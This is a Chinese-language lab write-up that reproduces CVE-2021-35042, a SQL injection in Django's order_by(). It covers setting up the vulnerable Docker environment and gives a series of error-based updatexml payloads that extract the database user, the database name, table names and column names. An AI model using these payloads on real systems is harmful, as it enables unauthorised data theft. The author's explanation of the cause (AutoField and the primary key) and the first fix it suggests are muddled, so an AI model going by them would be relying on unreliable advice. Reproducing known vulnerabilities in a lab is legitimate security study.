Django之SQL注入漏洞复现(CVE-2021-35042)
前言SQL注入的原理是对web请求,表单或域名等提交查询的字符串没有进行安全检测过滤,攻击者可以拼接执行恶意SQL命令,导致用户数据泄露
漏洞原理
Django 组件存在 SQL 注入漏洞,该漏洞是由于对 QuerySet.order_by()中用户提供数据的过滤不足,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行 SQL 注入攻击,最终造成服务器敏感信息泄露。
以下是我自己的理解,根据Django使用的框架中,他创建了apps.py并执行,会自动生成一个models.py
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225175620926-91105787.png
models.py调用了Collection的这个类
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225175908679-714723755.png
然后发送到了这边,而models又需要migrations来迁移文件,其中调用了models.AutoField,而它如果在没有增加id这个字段的时候,会自动增加一个自增的数据库类型的字段id,但恰恰在此需要设为主键(primary_key=True)否则又会报错,导致错误将id设置为主键,可以执行SQL命令且没有被过滤
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225180433790-845146446.png
所以当order==id时会出现一个自增序列的数据(可以是ID也是等于id)
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225181253877-348218018.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225181119816-1787180241.png
而当order=-ID又会出现问题,而打印出一些敏感信息
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225181357839-44711066.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225181611881-579000831.png
*影响版本
Django 3.2
Django 3.1
环境搭建
靶机: 192.168.31.230
yum-config-manager --add-repo https://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce.repo //下载阿里的镜像yum源
yum install docker-ce docker-ce-cli contaninerd.io
wget https://github.com/docker/compose/releases/download/1.25.0-rc4/docker-compose-Linux-x86_64 //下载docker-compose
service docker start
详细docker搭建请参考此链接:https://www.cnblogs.com/BlogVice-2203/p/16977227.html将CVE-2021-35042上传到centos7
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225110457519-1354638022.png
docker-compose build
docker-compose up -d//启动漏洞环境https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225110638869-1165832143.png
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225110715962-1457050080.png
环境启动成功后,查看http://your-ip:8000访问首页
https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225184440611-2085964706.png
构造poc
查当前用户
?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20user())),1)%23https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225140919709-828043687.png
查当前数据库
?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20database())),1)%23https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225142807592-1915269511.png
查表
?order=vuln_collection.name);select%20updatexml(1,%20concat(0x7e,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())),1)%23https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225142745165-1257392438.png
查字段
?order=vuln_collection.name);select%20updatexml(1,concat(0x5c,(select%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27%20limit%200,1),0x5c),1)%23https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225143931838-415829651.png
查字段
?order=vuln_collection.name);select%20updatexml(1,concat(0x5c,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27vuln_collection%27limit%201,1),0x5c),1)%23https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225145055400-1435152546.png
查数据
?order=vuln_collection.name);select%20updatexml(1,concat(0x5c,(select%20column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27vuln_collection%27limit%201,1),0x5c),1)%23https://img2023.cnblogs.com/blog/2913000/202212/2913000-20221225145208731-2075116381.png
修复建议
1.将除了id以外的其他字段其中一个设置为主键(我自己对AutoField()的理解),这样或许可以避免id成为主键自增,在数据库中就没有了主键id,就不会导致SQL注入产生
2.更新最新版本
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
页:
[1]